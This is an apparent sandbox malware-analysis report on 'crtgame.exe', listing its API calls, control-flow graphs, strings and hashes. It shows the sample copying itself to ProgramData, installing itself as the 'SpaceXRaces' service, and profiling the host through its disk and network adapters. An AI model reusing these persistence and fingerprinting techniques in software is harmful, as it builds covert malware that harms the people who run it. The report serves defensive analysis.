51 Function_00402B1E 53 Function_00402A20 54 Function_00402428 54->105 56 Function_00405A2E 56->27 88 Function_00405AFA 56->88 57->15 57->70 59 Function_00404B30 59->0 59->48 93 Function_00404A82 59->93 60 Function_00402132 61 Function_00405D33 63 Function_00405D37 64 Function_00404B38 64->0 64->48 64->93 73 Function_00402ED2 65->73 66 Function_00404FC5 67->21 67->60 67->105 68 Function_004054C7 68->19 68->37 78 Function_004056DD 68->78 112 Function_004056AA 68->112 69 Function_004041CB 69->23 70->6 70->21 70->34 73->49 91 Function_00402EFE 73->91 74 Function_004023D3 75 Function_004092D3 76 Function_004051D5 77 Function_00402DD7 80 Function_004029E5 81 Function_00404AEA 82 Function_004051EC 83->1 83->7 83->52 83->72 83->79 83->105 122 Function_00401FBE 83->122 104 Function_00403C9C 84->104 85 Function_00404BF5 85->93 87->73 88->123 89->21 121 Function_00401CBD 89->121 90 Function_004029FC 91->5 108 Function_004036A3 91->108 92->6 92->21 92->34 92->105 93->48 94 Function_00405C83 94->106 102 Function_00405496 95->102 96->68 97->2 97->45 99 Function_00405390 100->24 100->65 116 Function_00404DB3 103->116 107 Function_00402BA0 108->17 113 Function_004039AC 108->113 110->69 111->11 111->22 111->39 115->3 115->30 115->41 117 Function_00403DB4 115->117 116->56 116->88 118 Function_00405EB7 119->69 120 Function_00405EBB 122->50 122->105 123->105 123->106

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402714
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 0040272B
                                                                              • GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402748
                                                                              • CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274F
                                                                              • GetLocalTime.KERNEL32(00409F20,?,00000000), ref: 0040275C
                                                                              • lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277E
                                                                              • CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027CB
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D2
                                                                              • ExitProcess.KERNEL32 ref: 004027D9
                                                                              • lstrcmpiW.KERNEL32(?,00407104,?,00000000), ref: 004027FB
                                                                              • RegCreateKeyExA.KERNELBASE(80000002,Software\SpaceRaces,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 0040282A
                                                                              • GetTickCount.KERNEL32 ref: 0040284D
                                                                              • wsprintfA.USER32 ref: 00402865
                                                                              • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402888
                                                                              • RegCloseKey.KERNELBASE(?), ref: 00402891
                                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040294C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
                                                                              • String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$Software\SpaceRaces$SpaceXRaces$SpaceXRaces$test$tsr1209%d
                                                                              • API String ID: 99468869-3986529438
                                                                              • Opcode ID: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                              • Instruction ID: 49dc81ac6bcf3fd683536614608e289c009f5af55911e209b1bd681bcac14ea3
                                                                              • Opcode Fuzzy Hash: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                              • Instruction Fuzzy Hash: 4B5131B1940209BFEB10DBA09E49FAE7BBCEB04345F104076F606F21E1D7789D148B69

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,74DEF360,00000000), ref: 00402582
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,74DEF360,00000000), ref: 00402589
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360), ref: 004025EA
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360,00000000), ref: 004025F1
                                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402608
                                                                              • RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,?), ref: 00402632
                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360,00000000), ref: 00402643
                                                                              • CreateDirectoryA.KERNELBASE(C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402665
                                                                              • CopyFileA.KERNEL32(?,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402694
                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A2
                                                                              • CreateServiceA.ADVAPI32(00000000,SpaceXRaces,SpaceXRaces,000F01FF,00000010,00000002,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C3
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 004026D0
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E4
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
                                                                              • String ID: .exe$C:\ProgramData\SpaceXRaces\SpaceXRaces.exe$Common AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$SpaceXRaces
                                                                              • API String ID: 3461818117-4011302265
                                                                              • Opcode ID: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                              • Instruction ID: a3d5b12e1f90bb5d6e2ef9e639674f7dcae6e36a2f4b11c7066e8bc7fc52f7b9
                                                                              • Opcode Fuzzy Hash: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                              • Instruction Fuzzy Hash: 264193B1940108BBEB20ABA1DE4EE9F3A6CEF41749F00043AF601B11D2D7BD5D508A7D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 65 401b54-401b71 LoadLibraryA 66 401b77-401b88 GetProcAddress 65->66 67 401c2a-401c2e 65->67 68 401c21-401c24 FreeLibrary 66->68 69 401b8e-401b97 66->69 68->67 70 401b9e-401bae GetAdaptersInfo 69->70 71 401bb0-401bb9 70->71 72 401be4-401bec 70->72 75 401bca-401be0 call 402d20 call 4018cc 71->75 76 401bbb-401bbf 71->76 73 401bf5-401bf9 72->73 74 401bee-401bf4 call 402d06 72->74 79 401bfb-401bff 73->79 80 401c1e-401c20 73->80 74->73 75->72 76->72 81 401bc1-401bc8 76->81 79->80 84 401c01-401c04 79->84 80->68 81->75 81->76 86 401c06-401c0c 84->86 87 401c0f-401c1c call 402cf8 84->87 86->87 87->70 87->80
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
                                                                              • GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
                                                                              • FreeLibrary.KERNEL32(00401A3E), ref: 00401C24
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                              • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                              • API String ID: 514930453-3667123677
                                                                              • Opcode ID: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                              • Instruction ID: 19d1f7c7220f150a124496b0f3bded62544c7fcf715814b2fda3adae34ef3130
                                                                              • Opcode Fuzzy Hash: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                              • Instruction Fuzzy Hash: 9D21B870944209AFEF21DFA5C9447EFBBB4EF45344F0440BAE504B22E1E7789A85CB69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 91 401a58-401a80 CreateFileA 92 401a86-401a9a 91->92 93 401b4e-401b53 91->93 94 401aa1-401ac9 DeviceIoControl 92->94 95 401acb-401ad3 94->95 96 401afc-401b04 94->96 97 401ad5-401adb 95->97 98 401add-401ae2 95->98 99 401b06-401b0c call 402d06 96->99 100 401b0d-401b10 96->100 97->96 98->96 103 401ae4-401afa call 402d20 call 4018cc 98->103 99->100 101 401b12-401b15 100->101 102 401b43-401b4d CloseHandle 100->102 106 401b30-401b3d call 402cf8 101->106 107 401b17-401b20 GetLastError 101->107 102->93 103->96 106->94 106->102 107->102 109 401b22-401b25 107->109 109->106 112 401b27-401b2d 109->112 112->106
                                                                              APIs
                                                                              • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
                                                                              • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
                                                                              • GetLastError.KERNEL32 ref: 00401B17
                                                                              • CloseHandle.KERNELBASE(?), ref: 00401B46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                              • String ID: \\.\PhysicalDrive0
                                                                              • API String ID: 4026078076-1180397377
                                                                              • Opcode ID: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                              • Instruction ID: 2ab55ed144571c3fa2fc985b9ad89e39486dc60e53794fabb09e903d28ee3d3f
                                                                              • Opcode Fuzzy Hash: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                              • Instruction Fuzzy Hash: 9E317A71D00118AADB21EF96CD849EFBBB9EF40750F20817AE515B22A0E3785E45CF98

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetVersion.KERNEL32 ref: 00402F98
                                                                                • Part of subcall function 004032AA: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                                • Part of subcall function 004032AA: HeapDestroy.KERNEL32 ref: 004032FA
                                                                              • GetCommandLineA.KERNEL32 ref: 00402FE6
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403011
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403034
                                                                                • Part of subcall function 0040308D: ExitProcess.KERNEL32 ref: 004030AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                              • String ID:
                                                                              • API String ID: 2057626494-0
                                                                              • Opcode ID: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                              • Instruction ID: 67841cd3009d396f381f20147254ff52d2e2d79fbc7827c85a5f588a1a3baf3d
                                                                              • Opcode Fuzzy Hash: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                              • Instruction Fuzzy Hash: 24217FB1800714AADB04AFA6DD0AA6E7BB9EB45704F10413EFA05BB2D1DB384850CB59

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 144 401c5b-401c7c GetWindowsDirectoryA 145 401cb7-401cbc 144->145 146 401c7e-401ca0 CreateFileA 144->146 146->145 147 401ca2-401cb1 GetFileTime CloseHandle 146->147 147->145
                                                                              APIs
                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
                                                                              • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
                                                                              • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401CB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateDirectoryHandleTimeWindows
                                                                              • String ID:
                                                                              • API String ID: 87451460-0
                                                                              • Opcode ID: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                              • Instruction ID: cc4b8a8173e68006100f6bb5cfe5cbca554eec38252bcd741f722b6c7c402e1e
                                                                              • Opcode Fuzzy Hash: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                              • Instruction Fuzzy Hash: 7CF0E27668021077E6209B359E8DFCB3AAD9BC6B60F010134BB46F21D0D6B49551C6B4

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 148 4041cb-4041d5 149 4041d7-4041e2 GetCurrentProcess TerminateProcess 148->149 150 4041e8-4041fe 148->150 149->150 151 404200-404207 150->151 152 40423c-404250 call 404264 150->152 154 404209-404215 151->154 155 40422b-40423b call 404264 151->155 161 404262-404263 152->161 162 404252-40425c ExitProcess 152->162 158 404217-40421b 154->158 159 40422a 154->159 155->152 163 40421d 158->163 164 40421f-404228 158->164 159->155 163->164 164->158 164->159
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041DB
                                                                              • TerminateProcess.KERNEL32(00000000,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041E2
                                                                              • ExitProcess.KERNEL32 ref: 0040425C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                              • Instruction ID: 04da20acb35bf9441239f1d62556dfb4fa7ea4fed694bd47aa7006e356793b78
                                                                              • Opcode Fuzzy Hash: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                              • Instruction Fuzzy Hash: 8E01D2B2648300DEDA10AF65FE44A0A7BA4FBD4790B10857FF281771E0D739A851CA2E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 165 4032aa-4032c8 HeapCreate 166 403300-403302 165->166 167 4032ca-4032d7 call 403162 165->167 170 4032e6-4032e9 167->170 171 4032d9-4032e4 call 403307 167->171 172 403303-403306 170->172 173 4032eb call 403b58 170->173 177 4032f0-4032f2 171->177 173->177 177->172 178 4032f4-4032fa HeapDestroy 177->178 178->166
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                                • Part of subcall function 00403162: GetVersionExA.KERNEL32 ref: 00403181
                                                                              • HeapDestroy.KERNEL32 ref: 004032FA
                                                                                • Part of subcall function 00403307: HeapAlloc.KERNEL32(00000000,00000140,004032E3,000003F8), ref: 00403314
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocCreateDestroyVersion
                                                                              • String ID:
                                                                              • API String ID: 2507506473-0
                                                                              • Opcode ID: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                              • Instruction ID: 5e09d6e980c9b6bd0e9d6ae44655ccf46c8d477683af571ce1b4adb312d05453
                                                                              • Opcode Fuzzy Hash: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                              • Instruction Fuzzy Hash: C5F065306543019AEB201F309E4AB2A3EA89754757F14483BF841FD1D1EF7D8691950E

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • RegisterServiceCtrlHandlerA.ADVAPI32(SpaceXRaces,Function_000023D3), ref: 00402436
                                                                              • SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
                                                                              • GetLastError.KERNEL32 ref: 00402497
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A4
                                                                              • GetLastError.KERNEL32 ref: 004024C5
                                                                              • SetServiceStatus.ADVAPI32(0040A058), ref: 004024F5
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00002351,00000000,00000000,00000000), ref: 00402501
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040250A
                                                                              • CloseHandle.KERNEL32 ref: 00402516
                                                                              • SetServiceStatus.ADVAPI32(0040A058), ref: 0040253F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                              • String ID: SpaceXRaces
                                                                              • API String ID: 3346042915-182686438
                                                                              • Opcode ID: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                              • Instruction ID: 823e7604a9f11b62abb5769871faa090ae10b28c447e591ffcb139ee33df3efb
                                                                              • Opcode Fuzzy Hash: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                              • Instruction Fuzzy Hash: F821A9B0841348EBD2119F36FF48E177FA8EB96719715813AE505B22B0C7BA0464DF2E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 212 405b6f-405b9d 213 405be5-405be8 212->213 214 405b9f-405bb9 LCMapStringW 212->214 217 405bfa-405c02 213->217 218 405bea-405bf7 call 405d93 213->218 215 405bc3-405bd5 LCMapStringA 214->215 216 405bbb-405bc1 214->216 219 405bdb 215->219 220 405cfd 215->220 216->213 222 405c21-405c24 217->222 223 405c04-405c1c LCMapStringA 217->223 218->217 219->213 225 405cff-405d10 220->225 222->220 226 405c2a-405c2d 222->226 223->225 227 405c37-405c5b MultiByteToWideChar 226->227 228 405c2f-405c34 226->228 227->220 229 405c61-405c95 call 402da0 227->229 228->227 229->220 233 405c97-405cae MultiByteToWideChar 229->233 233->220 234 405cb0-405cc9 LCMapStringW 233->234 234->220 235 405ccb-405ccf 234->235 236 405d11-405d47 call 402da0 235->236 237 405cd1-405cd4 235->237 236->220 244 405d49-405d5f LCMapStringW 236->244 238 405cda-405cdd 237->238 239 405d8c-405d8e 237->239 238->220 241 405cdf-405cf7 LCMapStringW 238->241 239->225 241->220 241->239 244->220 245 405d61-405d66 244->245 246 405d68-405d6a 245->246 247 405d6c-405d6f 245->247 248 405d72-405d86 WideCharToMultiByte 246->248 247->248 248->220 248->239
                                                                              APIs
                                                                              • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405BB1
                                                                              • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BCD
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,N@ ,?,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C16
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C4E
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide
                                                                              • String ID: N@
                                                                              • API String ID: 352835431-2588724849
                                                                              • Opcode ID: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                              • Instruction ID: 59135ce53bc3b83908b259842d99def5e9dba23692ba7c4f82a52b333c41bde6
                                                                              • Opcode Fuzzy Hash: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                              • Instruction Fuzzy Hash: 69516B31500609ABDF218F54CD45E9F7BB9EB48710F10813AF912B12A0D33A9961EF69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 249 4058a7-4058b2 250 4058b4-4058c3 LoadLibraryA 249->250 251 4058f6-4058fd 249->251 252 4058c5-4058da GetProcAddress 250->252 253 40592c-40592e 250->253 254 405915-405921 251->254 255 4058ff-405905 251->255 252->253 257 4058dc-4058f1 GetProcAddress * 2 252->257 256 405928-40592b 253->256 254->256 255->254 259 405907-40590e 255->259 257->251 259->254 260 405910-405913 259->260 260->254
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D6D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 004058B9
                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004058D1
                                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004058E2
                                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004058EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                              • API String ID: 2238633743-4073082454
                                                                              • Opcode ID: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                              • Instruction ID: 33924f41f48bfa595f86144282b4f53d1c2fc39b1daf6c652de04afaa2dac454
                                                                              • Opcode Fuzzy Hash: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                              • Instruction Fuzzy Hash: F4017171640711EFC7109FB5AD8091B3BE8EA887A0712043FA505F23E2DA7988619F2D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 262 405dbe-405ded 263 405e2d-405e30 262->263 264 405def-405e05 GetStringTypeW 262->264 265 405e32-405e37 263->265 266 405e56-405e59 263->266 267 405e07-405e09 264->267 268 405e0b-405e1f GetStringTypeA 264->268 269 405e39 265->269 270 405e3e-405e51 GetStringTypeA 265->270 271 405ef3 266->271 272 405e5f-405e62 266->272 273 405e28 267->273 268->271 274 405e25-405e27 268->274 269->270 275 405ef5-405f06 270->275 271->275 276 405e64-405e69 272->276 277 405e6c-405e8e MultiByteToWideChar 272->277 273->263 274->273 276->277 277->271 278 405e90-405ec8 call 402da0 call 402ca0 277->278 278->271 284 405eca-405ee1 MultiByteToWideChar 278->284 284->271 285 405ee3-405ef1 GetStringTypeW 284->285 285->275
                                                                              APIs
                                                                              • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFD
                                                                              • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405E17
                                                                              • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E4B
                                                                              • MultiByteToWideChar.KERNEL32(N@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E83
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405ED9
                                                                              • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405EEB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: StringType$ByteCharMultiWide
                                                                              • String ID: N@
                                                                              • API String ID: 3852931651-2588724849
                                                                              • Opcode ID: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                              • Instruction ID: efd9f9df0c83a1a94f90d52e1acc00adac850a8b7f95784ade7c71040f2db77a
                                                                              • Opcode Fuzzy Hash: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                              • Instruction Fuzzy Hash: 6E414C72900619AFCF209F94DD85EAF7B78FB08750F10443AF912B2290D7398A619B99
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404CB6
                                                                              • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00404D8C
                                                                              • WriteFile.KERNEL32(00000000), ref: 00404D93
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
